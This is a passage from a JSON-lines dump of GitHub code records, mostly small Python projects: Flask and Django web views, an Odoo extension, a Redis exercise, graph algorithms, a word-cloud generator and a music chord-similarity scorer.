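    proc = multiprocessing.Process(target=worker, daemon=True)
    proc.start()
    proc.terminate()   # what stop() presumably intended
    proc.join()
    print(proc.exitcode)
```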
formR=ReportForm())\n\t\n@mod_web.route('/myevents', methods=['GET', 'POST'])\ndef myevents():\n\tif request.method == \"POST\":\n\t\tform = EventForm(request.form)\n\n\t\tif not form.validate_on_submit():\n\t\t\tprint(form.errors)\n\t\t\treturn render_template(\"web/myevents.html\", form=form, errors=form.errors, display=True)\n\t\telse:\n\t\t\teventData, numShowings = controller.form_to_event_object(form)\n\n\t\t\ttry:\n\t\t\t\tif \"poster\" in request.files:\n\t\t\t\t\t# Upload image to S3.\n\t\t\t\t\tfile_url = controller.upload_file(request.form['event_id'], request.files[\"poster\"])\n\t\t\t\t\t# Update event with image URL.\n\t\t\t\t\t\n\t\t\t\t\teventData[\"poster\"] = file_url\n\t\t\texcept Exception as e:\n\t\t\t\tflash(\"Error: \" + str(e))\n\t\t\t\treturn render_template(\"web/myevents.html\", form=EventForm())\n\n\t\t\t# make API request\n\t\t\tevent_id = request.form['event_id']\n\t\t\tr = controller.make_edit_request(event_id, eventData)\n\t\t\t\n\t\t\tif r.status_code != 200:\n\t\t\t\tflash(\"Something went wrong. Please contact a developer.\")\n\t\t\t\treturn render_template(\"web/myevents.html\", form=EventForm())\n \n\t\t\tr = json.loads(r.text)\n\t\t\tif r[\"status\"] == \"Success\":\n\t\t\t\tflash(\"Success! Your event has been edited.\")\n\t\t\t\treturn redirect(\"/myevents?event=%s\" % event_id)\n\t\t\telse:\n\t\t\t\tflash(\"Error. \" + r[\"error_msg\"])\n\t\t\t\treturn render_template(\"web/myevents.html\", form=EventForm(), display=True, numRows=numShowings)\n\telse:\n\t\treturn render_template(\"web/myevents.html\", form=EventForm(), display=False, numRows=1)\n\n@mod_web.route('/add', methods=['GET', 'POST'])\n@login_required\ndef addEvent():\n\tif request.method == \"POST\":\n\t\tform = EventForm(request.form)\n\t\tif not form.validate_on_submit():\n\t\t\treturn render_template(\"web/add.html\", form=form, errors=form.errors, wereErrors=True)\n\t\telse:\n\t\t\teventData, numShowings = controller.form_to_event_object(form)\n\t\t\t\n\t\t\t# make API request\n\t\t\theaders = { \"Authorization\" : \"Token %s\" % current_user.token }\n\t\t\tr = requests.put(CONFIG[\"BASE_URL\"]+\"/api/event/add\", \n\t\t\t\tjson = eventData, headers = headers)\n\n\t\t\tif r.status_code != 200:\n\t\t\t\tflash(\"Error: something went wrong. Please contact a developer.\")\n\t\t\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=numShowings, wereErrors=True)\n\t\t\tr = json.loads(r.text)\n\t\t\tif r[\"status\"] == \"Success\":\n\t\t\t\tevent_id = r[\"data\"][\"id\"]\n\t\t\t\t# If event was successfully added, upload poster & update event.\n\t\t\t\ttry:\n\t\t\t\t\tif \"poster\" in request.files:\n\t\t\t\t\t\t# Upload image to S3.\n\t\t\t\t\t\tfile_url = controller.upload_file(event_id, request.files[\"poster\"])\n\t\t\t\t\t\t# Update event with image URL.\n\t\t\t\t\t\t\n\t\t\t\t\t\t# TODO: Handle failures better (or at all).\n\t\t\t\t\t\tcontroller.make_edit_request(event_id, {'poster': file_url})\n\t\t\t\texcept Exception as e:\n\t\t\t\t\t# If adding the image fail, delete the event and pretend like\n\t\t\t\t\t# nothing happened.\n\t\t\t\t\tcontroller.make_delete_request(event_id)\n\t\t\t\t\tflash(\"Error. \" + str(e))\n\t\t\t\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=numShowings, wereErrors=True)\n\n\t\t\t\tflash(\"Success! Your event has been added.\")\n\t\t\t\treturn redirect(\"/myevents?event=\"+event_id)\n\t\t\telse:\n\t\t\t\tflash(\"Error. 
\" + r[\"error_msg\"])\n\t\t\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=numShowings, wereErrors=True)\n\telse:\n\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=1)\n\t\t\n@mod_web.route('/about', methods=['GET', 'POST'])\ndef about():\n\tif request.method == \"POST\":\n\t\tform = FeedbackForm(request.form)\n\t\teventData = {\"feedback\": request.form[\"feedback\"]}\n\t\tr = requests.put(CONFIG[\"BASE_URL\"]+\"/api/feedback/\", json = eventData)\n\t\tif r.status_code != 200:\n\t\t\t\tflash(\"Error: something went wrong. Please contact a developer.\")\n\t\t\t\treturn render_template(\"web/about.html\", formF=FeedbackForm())\n\t\tr = json.loads(r.text)\n\t\tif r[\"status\"] == \"Success\":\n\t\t\tflash(\"Thank you! Your feedback has been reported.\")\n\t\t\treturn redirect(\"about\")\n\t\telse:\n\t\t\tflash(\"Error in reporting feedback: \" + r[\"error_msg\"])\n\t\t\treturn render_template(\"web/about.html\", formF=FeedbackForm())\n\n\treturn render_template(\"web/about.html\", formF=FeedbackForm())\n\n","repo_name":"JackNeus/lampPost","sub_path":"app/mod_web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13648563509","text":"from flask import Flask, jsonify, request\r\nimport csv\r\nfrom storage import all_articles, liked_articles, unliked_articles\r\nfrom demographic_filtering import output \r\nfrom content_filtering import get_recommendations\r\nwith open('articles.csv',encoding = 'utf-8') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n all_articles = data[1:]\r\nliked_articles = []\r\nunliked_articles = []\r\napp = Flask(__name__)\r\n@app.route('/get-article',methods = ['GET'])\r\ndef get_article():\r\n return jsonify({\r\n 'data':all_articles[0],\r\n 'status':'success'\r\n })\r\n@app.route('/liked-article',methods = ['POST'])\r\ndef liked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n liked_articles.append(article)\r\n return jsonify({\r\n 'status':'success'\r\n }),201\r\n@app.route('/unliked-article',methods = ['POST'])\r\ndef unliked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n unliked_articles.append(article)\r\n return jsonify({\r\n 'status':'success'\r\n }),201\r\n@app.route(\"/popular-article\",methods = ['GET'])\r\ndef popular_article(): \r\n article_data = [] \r\n for article in output: \r\n _d = { \r\n 'total_events':article[0] }\r\n article_data.append(_d) \r\n return jsonify({ \"data\": article_data, \"status\": \"success\" }), 200\r\nif __name__ == '__main__':\r\n app.run()","repo_name":"HridyanshSangal/Project142","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16903802391","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\nclass PartnerCategory(models.Model):\n _inherit = 'res.partner.category'\n\n @api.model\n def get_tagnames_of_partner (self, partner = 0):\n\n return list(map(lambda x: {\n 'value': x.id,\n 'text': x.name,\n 'assign': partner in x.partner_ids.ids\n } , self.env['res.partner.category'].sudo().search([('active', '=', True)])))\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n\n @api.model\n def create_from_ui(self, partner):\n partner_id = super(ResPartner, self).create_from_ui(partner)\n\n cat_list = [] if not 
partner['category_id'] else [int(x) for x in partner['category_id'].split(',')]\n \n self.browse(partner_id).write({'category_id': [(6, 0, cat_list)]})\n\n return partner_id","repo_name":"youngcut/odoo","sub_path":"pos_tags/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12458711892","text":"import sys\nimport numpy as np\nfrom scipy.ndimage import generic_filter\nfrom copy import deepcopy\nimport itertools\nimport math\n\nfile = sys.argv[1] if len(sys.argv) > 1 else \"ex1\"\nlines = list(map(lambda l: l.rstrip(), open(file + \".txt\").readlines()))\n\n# ----------------------------------------------------------------------\n# * Parsing(/setup)\n\nschematic = np.mat([list(line) for line in lines])\n\n# ----------------------------------------------------------------------\n# * Part 1\n\n\ndef map_symbol(c: str):\n if c == '.':\n return -20\n elif c.isdigit():\n return -int(c) - 1\n else:\n return -30\n\n\ndef grow(region):\n mask = np.ma.masked_where(region == -30, region).mask\n if mask.sum() >= 1 and region[4] in range(-10, 0):\n return -region[4] - 1\n if region[4] in range(-10, 0) and (region[3] in range(0, 10) or region[5] in range(0, 10)):\n return -region[4] - 1\n return region[4]\n\n\ndef cleanup(x: int):\n if x in range(0, 10):\n return str(x)\n else:\n return '.'\n\n\ndef find_nums(schematic):\n old = schematic\n new = generic_filter(schematic, grow, size=3)\n while not np.array_equal(old, new):\n old = new\n new = generic_filter(old, grow, size=3)\n nums = np.vectorize(cleanup)(new)\n nums = [[int(num) for num in \"\".join(line).split('.') if num != \"\"]\n for line in nums]\n return list(itertools.chain(*nums))\n\n\nmapped = np.vectorize(map_symbol)(schematic)\ntotal = sum(find_nums(mapped))\n\nprint(\"Part 1: \" + str(total))\n\n# ----------------------------------------------------------------------\n# * Part 2\n\n\ndef map_gear(c: str):\n if c.isdigit():\n return -int(c) - 1\n else:\n return -20\n\n\ntotal = 0\nmapped = np.vectorize(map_gear)(schematic)\nfor [r, c] in np.argwhere(schematic == '*'):\n m = deepcopy(mapped)\n m[r, c] = -30\n rows = []\n if r != 0:\n rows.append(r-1)\n rows.append(r)\n if r != schematic.shape[0] - 1:\n rows.append(r + 1)\n m = m[rows, :]\n nums = find_nums(m)\n if len(nums) == 2:\n gear_ratio = math.prod(nums)\n total += gear_ratio\n\n\nprint(\"Part 2: \" + str(total))\n","repo_name":"U32Float/AoC","sub_path":"2023/day3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2938298861","text":"import os\nimport time\nimport logging\n\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\ndef some_heavy_task():\n logging.warning(\"Start heavy task!!\")\n time.sleep(5)\n logging.warning(\"Finish heavy task!!\")\n\n\n@app.route(\"/\")\ndef hello_world():\n some_heavy_task()\n name = os.environ.get(\"NAME\", \"World\")\n return \"Hello {}!\".format(name)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 8080)))\n","repo_name":"8mamo10/torres","sub_path":"app/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17794141424","text":" # -*- coding: utf-8 -*-\nimport 
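Editor's note on the AoC day-3 record above: its region-growing pass relies on `scipy.ndimage.generic_filter` handing each 3x3 neighbourhood to the callback as a flat 9-element array, with index 4 the centre cell. A tiny demonstration of that calling convention:

```python
# generic_filter passes the flattened footprint; w[4] is the centre for size=3.
import numpy as np
from scipy.ndimage import generic_filter

grid = np.arange(9).reshape(3, 3).astype(float)
centre_plus_max = generic_filter(grid, lambda w: w[4] + w.max(), size=3)
print(centre_plus_max)
```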
redis\n\nredis_host = \"localhost\"\nredis_port = 6379\n#Connect with database\nr = redis.StrictRedis(host=redis_host, port=redis_port,\n db = 0, decode_responses=True)\n#Test connection to database\ndef test_connection_database():\n try:\n \n r.hmset(\"msg\",\"Hello\")\n \n msg= r.hmget(\"msg\")\n print(msg)\n except Exception as e:\n print(e)\n\n#Create the appels with certains properties\ndef create_appels():\n try:\n appel1 = {\"id\":\"1\",\"heure\":\"3:54\",\"numero_origine\":\"0749048614\",\"statut\":\"Non affecte\", \"duree\":\"1:40\", \"operateur_id\":\"2\", \"description\":\"Appel domiciliare\"}\n appel2 = {\"id\":\"2\",\"heure\":\"2:39\",\"numero_origine\":\"0649048814\",\"statut\":\"Non pris en compte\", \"duree\":\"1:59\", \"operateur_id\":\"1\", \"description\":\"Appel formelle\"}\n appel3 = {\"id\":\"3\",\"heure\":\"1:23\",\"numero_origine\":\"0949048667\",\"statut\":\"En cours\", \"duree\":\"0:40\", \"operateur_id\":\"1\", \"description\":\"Appel\"}\n appel4 = {\"id\":\"4\",\"heure\":\"22:56\",\"numero_origine\":\"0756048615\",\"statut\":\"En cours\", \"duree\":\"0:04\", \"operateur_id\":\"3\", \"description\":\"Appel travail\"}\n \n r.hmset(\"appel1\", appel1)\n r.hmset(\"appel2\", appel2)\n r.hmset(\"appel3\", appel3)\n r.hmset(\"appel4\", appel4)\n except Exception as e:\n print(e)\n#To vizualize the properties of a appel\ndef view_appel(id):\n msg = r.hgetall(\"appel\"+id)\n print(msg)\n#Create the operateurs with certains properties\ndef create_operateurs():\n try:\n op1 = {\"id\":\"1\",\"nom\":\"James\", \"prenom\":\"Clara\", \"age\":\"15\"} \n op2 = {\"id\":\"2\",\"nom\":\"Silva\", \"prenom\":\"Augusto\", \"age\":\"67\"}\n op3 = {\"id\":\"3\",\"nom\":\"Costa\", \"prenom\":\"Maria\", \"age\":\"34\"}\n \n r.hmset(\"op1\", op1)\n r.hmset(\"op2\", op2)\n r.hmset(\"op3\", op3)\n except Exception as e:\n print(e)\n#Delete database informations\ndef delete_db():\n r.flushall()\n#Get all the appels of a especific Status\ndef search_statut(status):\n for key in r.scan_iter():\n if r.hmget(key,'statut'):\n for hash in r.hscan_iter(key, 'statut'):\n if status in hash[1]:\n print(key)\n return key\n#Get all the elements of the database\ndef get_all():\n for key in r.scan_iter():\n print(key)\n#Get all the operatus of the appels in Cours de traitement\ndef get_operateurs(key):\n print(key)\n for op_id in r.hscan_iter(key,'operateur_id'):\n for op in r.scan_iter():\n if r.hmget(op,'nom'):\n for hash in r.hscan_iter(op,'id'):\n if op_id[1] == hash[1]:\n print(r.hmget(op,'nom'))\n \n#Calling out the functions made\n\n#Testing database connection\ntest_connection_database()\n#Create db\ncreate_appels()\nview_appel(\"2\")\ncreate_operateurs()\n#Search appels en cours, non affecte\nsearch_statut(\"En cours\")\nsearch_statut(\"Non affecte\")\n#all operateurs of the appels\nget_operateurs(search_statut(\"En cours\"))\n","repo_name":"Scetienne/projetsNoSQL","sub_path":"redis_evaluation.py","file_name":"redis_evaluation.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35128280767","text":"graph = {\n 'A': ['B', 'F', 'I'],\n 'B': ['A', 'E', 'C'],\n 'C': ['B', 'E', 'D'],\n 'D': ['C', 'G', 'H'],\n 'E': ['B', 'C', 'G'],\n 'F': ['A', 'G'],\n 'G': ['E', 'F', 'D'],\n 'H': ['D'],\n 'I': ['A']\n}\n\n\ndef bfs(graph, start_node):\n visit = list()\n queue = list()\n\n queue.append(start_node)\n\n while queue:\n node =queue.pop(0)\n if node not in visit:\n visit.append(node)\n 
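Editor's note on the Redis record above: `r.hmset("msg", "Hello")` passes a bare string where redis-py expects a mapping, and `hmset()` itself is deprecated in redis-py; `hset()` with `mapping=` writes the same hash. A hedged sketch (assumes a server on localhost:6379):

```python
# hset(name, mapping=...) is the current redis-py spelling of hmset.
import redis

r = redis.StrictRedis(host='localhost', port=6379, db=0, decode_responses=True)
r.hset('appel1', mapping={'id': '1', 'statut': 'En cours'})
print(r.hgetall('appel1'))
```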
queue.extend(graph[node])\n\n return visit\n\n\nprint(bfs(graph, 'A'))","repo_name":"mjhongg/Study","sub_path":"algorithm/bfs_by_queue.py","file_name":"bfs_by_queue.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4499413463","text":"#time complexity is O(n^2)\ndef selectionSort(arr):\n length=len(arr)\n #put the correct element at ith position\n for i in range(length-1):\n minIndex=i\n #calculating the index of minimum element for this iteration\n for j in range(i+1,length):\n if(arr[j] 1:\n return randint(1, side_amount)\n else:\n raise ValueError(\"The amount of sides need to be a minimum of two.\")\n\n\ndef roll_all(dice_to_roll: dict[int, int]) -> list[int]:\n results = []\n for side_amount in dice_to_roll:\n for _ in range(dice_to_roll[side_amount]):\n results.append(roll(side_amount))\n return results\n","repo_name":"roan-paulus/yogsobot","sub_path":"yogsobot/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34246781208","text":"# The total number of babies named Odin born in Colorado according to the Social Security Administration\nimport shutil\nimport requests\nurl = 'http://www.ssa.gov/OACT/babynames/state/namesbystate.zip'\n# Downloading will take awhile...\nprint(\"Downloading\", url)\nresp = requests.get(url)\n# save to hard drive\nwith open(\"/tmp/ssastates.zip\", \"wb\") as f:\n f.write(resp.content)\n# unzip\nshutil.unpack_archive(\"/tmp/ssastates.zip\", \"/tmp\")\n# open up the file\nrows = open(\"/tmp/CO.TXT\").readlines()\ntotes = 0\nfor r in rows:\n if 'Odin' in r:\n totes += int(r.split(',')[4])\nprint(totes)\n\n","repo_name":"stanfordjournalism/search-script-scrape","sub_path":"scripts/80.py","file_name":"80.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1228,"dataset":"github-code","pt":"48"} +{"seq_id":"493306894","text":"import requests\nimport os\n\nrequest = requests.get('https://api.github.com/users/amfoss/repos?per_page=100')\nrepos = request.json()\nprint(\"amFOSS repositories\\n\")\nfor n in range(0,len(repos)):\n print( n+1, repos[n]['name'] ,\"\\n\")\nfor n in range(0,len(repos)):\n perceval=\"perceval git --json-line \" + repos[n]['html_url'] + \">> commits.json\"\n os.system(perceval)\n \n","repo_name":"azeemyoonus/amfoss-tasks","sub_path":"task-08/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16556305502","text":"from collections import defaultdict\n\n\nclass Solution(object):\n def canFinish1(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n go = [[0] * numCourses for _ in range(numCourses)]\n requisite = [[0] * numCourses for _ in range(numCourses)]\n que = deque()\n for j in prerequisites:\n go[j[0]][j[1]] += 1\n requisite[j[1]][j[0]] += 1\n\n for i in range(numCourses):\n if sum(go[i]) == 1:\n que.append(i)\n if not que:\n return False\n print(requisite)\n \n while que:\n start = que.popleft()\n for i in requisite:\n i[start] = 0\n for idx, i in enumerate(requisite[start]):\n if i == 1 and sum(requisite[idx]) == 0:\n requisite[start][idx] = 0\n que.append(idx)\n return True if not que else False\n\n ## 교재 코드\n def canFinish(self, 
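Editor's note on the BFS record above: `list.pop(0)` is O(n) per dequeue, so the traversal is quadratic in the worst case; `collections.deque.popleft()` is O(1) with identical visit order:

```python
# Same BFS, with a deque for O(1) dequeues.
from collections import deque

def bfs(graph, start):
    visited, queue = [], deque([start])
    while queue:
        node = queue.popleft()
        if node not in visited:
            visited.append(node)
            queue.extend(graph[node])
    return visited

print(bfs({'A': ['B', 'C'], 'B': ['A'], 'C': ['A']}, 'A'))  # ['A', 'B', 'C']
```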
numCourses, prerequisites):\n graph = defaultdict(list)\n\n for x, y in prerequisites:\n graph[x].append(y)\n traced = set()\n visited = set()\n\n def dfs(i):\n # 판독하는 부분\n if i in traced: # 순환구조이면, 탈출(못하는 거라서)\n return False\n if i in visited: # 방문한 곳이면 일단은 그냥 고\n return True\n\n traced.add(i)\n for y in graph[i]: # 연결된 부분 전체 파악\n if not dfs(y): # 순환 여부 확인\n return False\n\n traced.remove(i) # 이제 이친구는 순환 확인에 필요없음\n visited.add(i) # 방문 처리\n return True\n\n for x in list(graph):\n if not dfs(x):\n return False\n return True\n","repo_name":"junhong625/MOCOCO","sub_path":"[7주차] 그래프/[LeetCode 207번] Course Schedule/홍영민_교재.py","file_name":"홍영민_교재.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"34697124954","text":"from django.urls import path\nfrom app import views\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('post//', views.PostDetailView.as_view(), name='post_detail'),\n path('post/new/', views.CreatePostView.as_view(), name='post_new'),\n path('post//edit/', views.PostEditView.as_view(), name='post_edit'),\n path('post//delete/', views.PostDeleteView.as_view(), name='post_delete'),\n path('service/', views.ServiceView.as_view(), name='service'),\n path('blog/', views.BlogView.as_view(), name='blog'),\n path('price/', views.PriceView.as_view(), name='price'),\n path('contact/', views.ContactView.as_view(), name='contact'),\n path('wash/', views.WashView.as_view(), name='wash'),\n path('coating/', views.CoatingView.as_view(), name='coating'),\n path('polishing/', views.PolishingView.as_view(), name='polishing'),\n path('diagnosis/', views.DiagnosisView.as_view(), name='diagnosis'),\n path('program/', views.ProgramView.as_view(), name='program'),\n path('campany/', views.CampanyView.as_view(), name='campany'),\n path('store', views.StoreView.as_view(), name='store'),\n path('store//', views.StaffView.as_view(), name='staff'),\n path('calendar/', views.CalendarView.as_view(), name='calendar'),\n path('calendar////', views.CalendarView.as_view(), name='calendar'),\n path('booking/////', views.BookingView.as_view(), name='booking'),\n path('thanks/', views.ThanksView.as_view(), name='thanks'),\n path('mypage////', views.MyPageView.as_view(), name='mypage'),\n path('mypage/holiday/////', views.Holiday, name='holiday'),\n path('mypage/delete/////', views.Delete, name='delete'),\n path('category//', views.CategoryView.as_view(), name='category')\n]","repo_name":"Kogepan69/tatuo_coat","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70253136","text":"import requests\nimport string\n\n\nhtml_start_text = \"\\n\"\\\n\"\\n\\n\"\\\n\"\\n\"\\\n\"Tag Cloud Generator\\n\"\\\n\"\\n\"\\\n\"\\n\"\\\n\"
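Editor's note on the course-schedule record above: `canFinish1` references `deque` without importing it (only `defaultdict` is imported), so only the DFS version runs. A hedged alternative to the DFS cycle check: Kahn's algorithm, which completes a topological order iff the prerequisite graph is acyclic:

```python
# Kahn's algorithm as an iterative alternative to the DFS cycle check above.
from collections import defaultdict, deque

def can_finish(num_courses, prerequisites):
    graph, indegree = defaultdict(list), [0] * num_courses
    for course, pre in prerequisites:
        graph[pre].append(course)
        indegree[course] += 1
    queue = deque(i for i in range(num_courses) if indegree[i] == 0)
    taken = 0
    while queue:
        node = queue.popleft()
        taken += 1
        for nxt in graph[node]:
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                queue.append(nxt)
    return taken == num_courses

print(can_finish(2, [[1, 0]]), can_finish(2, [[1, 0], [0, 1]]))  # True False
```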
    \\n\"\n\nhtml_end_text = \"
    \" \\\n \" \" \\\n \"\"\n\nmin_font_size = 20\nmax_font_size = 200\n\n\n# Get the speech and store the main text in a variable\nspeech_url = requests.get(\"http://193.1.33.31:88/pa1/gettysburg.txt\")\nspeech_body = speech_url.text\n\nstopwords_url = requests.get(\"http://193.1.33.31:88/pa1/stopwords.txt\")\nstopwords_body = stopwords_url.text\n\n# Make it into a list so that each word is counted on its own\nspeech_words_list = speech_body.split()\nstopwords_list = stopwords_body.split(sep=\",\")\n\n# Initialise a dictionary\nd = {}\n\n# Print the words that are greater than 3 characters\nfor word in speech_words_list:\n if len(word) > 4:\n word = word.lower()\n word = word.strip(string.punctuation)\n print(word)\n if word in d:\n d[word] += 1\n else:\n d[word] = 1\n\n# Create Word Cloud\nwith open(\"cloud_tag.html\", 'w') as cloud:\n cloud.write(html_start_text)\n for word in speech_words_list:\n cloud.write(f\" {word} \\n\")\n cloud.write(html_end_text)\n","repo_name":"nataliebryden/Word-Cloud","sub_path":"word-cloud.py","file_name":"word-cloud.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19185538465","text":"from sys import stdout\r\nimport numpy as np\r\n\r\ndef showprogress(percentage, message='', sub=False):\r\n \"\"\"\r\n Show a progress bar in your command line to track the progress of your process. This is meant to\r\n be used in cases such as for-loops that are susceptible to take some time to exectute\r\n (eg. predicting in a for loop for a non-trivial number of iterations).\r\n @param percentage: a float number less or equal to 1 that represents the current progress. This\r\n this can simply be thought of as the quotient \"i/total\" where \"i\" is the index of the\r\n current element in the iteration, and \"total\" is the total number of elements to iterate\r\n through. NOTE: You're advised to you \"i+1\" instead of \"i\" and to put the statement at\r\n the very bottom of the loop.\r\n @param message (optional): a string message. If this variable is used and assigned a string,\r\n that string will be displayed next to the progress bar. This is mostly useful in case \r\n going through one iteration may require some heavy computations and therefore the for\r\n loop remains on the same element for some time. In such cases, this argument can be used\r\n to better indicate the status of the progress, eg. if there's a sort of label associated\r\n with each such iteration (like the name of something corresponding to the current\r\n index) we can display a message with that label (eg. \"Now parsing file file_name\").\r\n @param sub (optional): a boolean determining weather the current process is a sub process. This\r\n is useful because this progress method will display a new line once it reaches 100%. If\r\n we want to avoid that, we set this argument to \"True\". This argument is False by\r\n default.\r\n \r\n NOTE: It's advised to put this method as last statement of the iteration, with the index being\r\n the next index instead of the current one, i.e. 
\"i\" in \"i/total\" should actually be \"i+1\".\r\n \r\n Example Usage:\r\n for i,element in enumerate(array):\r\n ...\r\n # some computation\r\n ...\r\n util.showprogress((i+1)/len(array))\r\n\r\n # OR\r\n\r\n for i in range(some_integer_length):\r\n ...\r\n # some computation\r\n ...\r\n util.progress((i+1) / some_integer_length)\r\n \"\"\"\r\n length = 30\r\n percentage = percentage if percentage < 1 else 1\r\n done = int(length*percentage)\r\n left = length - done\r\n arrow = 0\r\n if done < length:\r\n done -= 1 if done > 0 else 0\r\n arrow = 1\r\n stdout.write('\\r[{}{}{}] {}% {}'.format(\r\n '='*done, '>'*arrow, '.'*left, int(round(percentage, 2)*100), message))\r\n if percentage == 1 and not sub:\r\n print('')\r\n\r\n\r\ndef chopin(references, candidates, mean=False):\r\n \"\"\"\r\n Chord Proxy Substitution ([Cho]rd [P]roxy Subst[i]tutio[n])\r\n Given a reference chord and a candidate chord, the Chopin evaluation score gives an estimate (in\r\n the form of a probability ranging from 0 to 100) of how confident we can be that the candidate\r\n chord can be used as a valid proxy to substitute in place of the reference chord.\r\n @param references: nd-array/list of frames. This is a group of integers where a value greater\r\n than 0 indicates a note being played. The shape of 'references' must be at least 1 and\r\n the same as the shape of `candidates`.\r\n @param candidates: nd-array/list of frames. This is a group of integers where a value greater\r\n than 0 indicates a note being played. The shape of 'candidates' must be at least 1 and\r\n the same as the shape of `references`.\r\n @param mean(optional): a boolean determining if we want the method to precompute the mean of all\r\n the scores before returning. If True, the method will return a float value corresponding\r\n to the overall score, if False, the method will return an nd-array of similar dimensions\r\n as the 'candidates' parameters where each frame is replaced by its score. This argument\r\n is False by default.\r\n \r\n @return score: if `mean` is False, an nd-array of the similar shape as the 'candidates'\r\n parameter except for the last dimension where each frame array is replaced by its\r\n respective score against the corresponding references frame; if `mean` is True, the mean\r\n of all the scores for all the frames.\r\n \"\"\"\r\n references, candidates = np.asarray(references, dtype=int), np.asarray(candidates, dtype=int)\r\n assert references.ndim >= candidates.ndim and references.ndim > 0, \"The references and \"\\\r\n +\"candidates arrays must have the same number of dimensions\"\r\n stacked = np.stack([references, candidates], axis=-2)\r\n nonzeros = np.apply_along_axis(lambda x: str(np.nonzero(x)[0]), -1, stacked)\r\n\r\n def seq2score(nonzeros):\r\n ref_idx, can_idx = nonzeros\r\n ref_idx = np.fromstring(ref_idx[1:-1], sep=' ', dtype=int)\r\n can_idx = np.fromstring(can_idx[1:-1], sep=' ', dtype=int)\r\n if (ref_idx.shape[0] == 0 and can_idx.shape[0] != 0) or\\\r\n (ref_idx.shape[0] != 0 and can_idx.shape[0] == 0):\r\n # Either `candidate` played where `reference` didn't play, or `candidate` didn't play\r\n # where `reference` played. In both cases, `candidate` is definitely not a proxy of\r\n # `reference`.\r\n return 0\r\n elif ref_idx.shape[0] == 0 and can_idx.shape[0] == 0:\r\n # `candidate` didn't play where `reference` didn't play. 
This is a 100% match.\r\n return 1\r\n\r\n root_score = 1\r\n ref_to_can = 1\r\n can_to_ref = 1\r\n NBR_NOTES = 12\r\n\r\n # As far as the Chopin score is concerned, we're only interested in the musical notes, not\r\n # the octave in which they're played. Therefore, we simplify all of them to the basic 12\r\n # notes.\r\n ref_idx = ref_idx%NBR_NOTES\r\n can_idx = can_idx%NBR_NOTES\r\n\r\n # Root Score\r\n if can_idx[0] == ref_idx[0]:\r\n # `candidate` has the same root note as `reference`. 100% match on the root.\r\n root_score = 1\r\n elif can_idx[0] in ref_idx[1:]:\r\n # If the root note in the candidate is a valid relative 3rd or 5th of the root note in\r\n # the reference and exists amongst the notes of the reference, then it's not a total\r\n # match but a very probably one (75%). Else if the new root note is not a relative of\r\n # the old root note, but is still amongst the notes in reference, then we give it 50%.\r\n true_root = ref_idx[0]\r\n relatives = [(true_root+i)%NBR_NOTES for i in [3,4,6,7,8]]\r\n root_score = .75 if can_idx[0] in relatives else .5\r\n else:\r\n root_score = .25\r\n \r\n # Reference to Candidate Score\r\n for note in ref_idx[1:]:\r\n if note not in can_idx:\r\n ref_to_can -= 1/len(ref_idx[1:])\r\n\r\n # Candidate to Reference Score\r\n for note in can_idx[1:]:\r\n if note not in ref_idx:\r\n can_to_ref -= 1/len(can_idx[1:])\r\n\r\n return root_score*ref_to_can*can_to_ref*100\r\n\r\n scores = np.apply_along_axis(seq2score, -1, nonzeros)\r\n if mean:\r\n return np.mean(scores)\r\n else:\r\n return scores\r\n\r\nif __name__ == '__main__':\r\n ref1 = [[[1,0,1,1], [1,0,1,1], [0,1,1,0]]]\r\n ref2 = [[[1,1,1,1], [0,0,1,1], [0,0,1,0]]]\r\n can1 = [[[0,1,1,1], [0,1,1,0], [0,0,0,0]]]\r\n can2 = [[[1,0,1,1], [1,0,1,1], 